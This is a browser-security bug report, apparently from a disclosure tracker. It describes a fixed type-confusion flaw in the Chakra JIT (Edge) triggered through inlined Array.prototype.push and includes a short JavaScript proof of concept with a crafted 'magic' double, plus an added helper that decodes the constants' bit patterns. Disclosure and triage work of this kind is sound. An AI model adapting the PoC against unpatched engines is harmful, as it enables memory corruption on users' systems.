Issue 1578

Starred by 2 users

Issue metadata

Status: Fixed
Closed: Aug 16


Microsoft Edge: Chakra: JIT: Type confusion with InlineArrayPush

Project Member Reported by, May 17 2018

Issue description

This is similar to issue 1531. The patch seems to prevent type confusion triggered from StElemI_A instructions. But the SetItem method can also be invoked through the Array.prototype.push method, which can be inlined. We can achieve type confusion with the push method in the same way used for issue 1531.

function opt(arr, value) {
    arr.push(value);  // <-------- Array.prototype.push, inlined by the JIT (InlineArrayPush)
    arr[0] = 2.3023e-320;
}

function main() {
    // Warm up opt() so the JIT compiles it against the array shapes seen here.
    for (let i = 0; i < 0x10000; i++) {
        let tmp = [1.1, 2.2, 3.3];
        delete tmp[1];  // leaves a hole (missing element) in the array

        opt(tmp, 2.2);
    }

    let arr = [1.1];
    opt(arr, -5.3049894784e-314);  // MAGIC VALUE!
}

main();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
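A decoding helper added here as an example (it is not part of the report or of Chakra): it prints the raw IEEE-754 bit pattern of a JavaScript number, which is how a triager can tell what a constant in a proof of concept actually encodes. Applied to the two constants in the PoC above, 2.3023e-320 is the subnormal whose raw bits are 0x0000000000001234, a small, easily recognised marker, and the value the report labels MAGIC VALUE, -5.3049894784e-314, is the subnormal with bits 0x8000000280000002, the 32-bit pattern 0x80000002 repeated in both halves. The report does not say what that pattern means inside the engine, and the helper makes no assumption about it; the names doubleToBits, describeDouble and REPORT_CONSTANTS are this example's own.

```javascript
// Added example (not part of the report): decode the raw IEEE-754 bit pattern
// of a JavaScript number so a reviewer can see what a PoC constant encodes.

function doubleToBits(x) {
  // Float64Array and BigUint64Array share one buffer and both use the host's
  // byte order, so reading the integer view yields the double's bit pattern.
  const f64 = new Float64Array(1);
  const u64 = new BigUint64Array(f64.buffer);
  f64[0] = x;
  return u64[0]; // BigInt
}

function describeDouble(x) {
  const bits = doubleToBits(x);
  const sign = Number(bits >> 63n);
  const exponent = Number((bits >> 52n) & 0x7ffn);
  const mantissa = bits & ((1n << 52n) - 1n);
  let kind;
  if (exponent === 0) {
    kind = mantissa === 0n ? "zero" : "subnormal";
  } else if (exponent === 0x7ff) {
    kind = mantissa === 0n ? "infinity" : "nan";
  } else {
    kind = "normal";
  }
  return {
    hex: "0x" + bits.toString(16).padStart(16, "0"),
    sign,
    exponent,
    mantissa,
    kind,
    // Splitting into 32-bit halves makes repeated or tagged-looking patterns
    // visible; subnormals with such structure were chosen for their bits,
    // not for their numeric magnitude.
    highWord: "0x" + (bits >> 32n).toString(16).padStart(8, "0"),
    lowWord: "0x" + (bits & 0xffffffffn).toString(16).padStart(8, "0"),
  };
}

// The two constants from the report's PoC, constructed here as sample input.
const REPORT_CONSTANTS = {
  storedValue: 2.3023e-320,
  magicValue: -5.3049894784e-314,
};

for (const [name, value] of Object.entries(REPORT_CONSTANTS)) {
  const d = describeDouble(value);
  console.log(
    `${name}: ${value} -> ${d.hex} (${d.kind}, high ${d.highWord}, low ${d.lowWord})`
  );
}
```

Run it with any modern JavaScript engine that supports BigInt typed arrays (Node.js 10.4 or later). The same routine is useful whenever a crash or PoC contains an unusually small or negative floating-point literal: if it decodes to a subnormal or NaN with structured low bits, the literal is a raw bit pattern smuggled through a number, and the engine code path that consumes those bits is where triage should look.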

Project Member

Comment 1 by, Aug 16

Status: Fixed (was: New)
Project Member

Comment 2 by, Aug 17

Labels: -Restrict-View-Commit
Project Member

Comment 3 by, Aug 27

Issue 1581 has been merged into this issue.
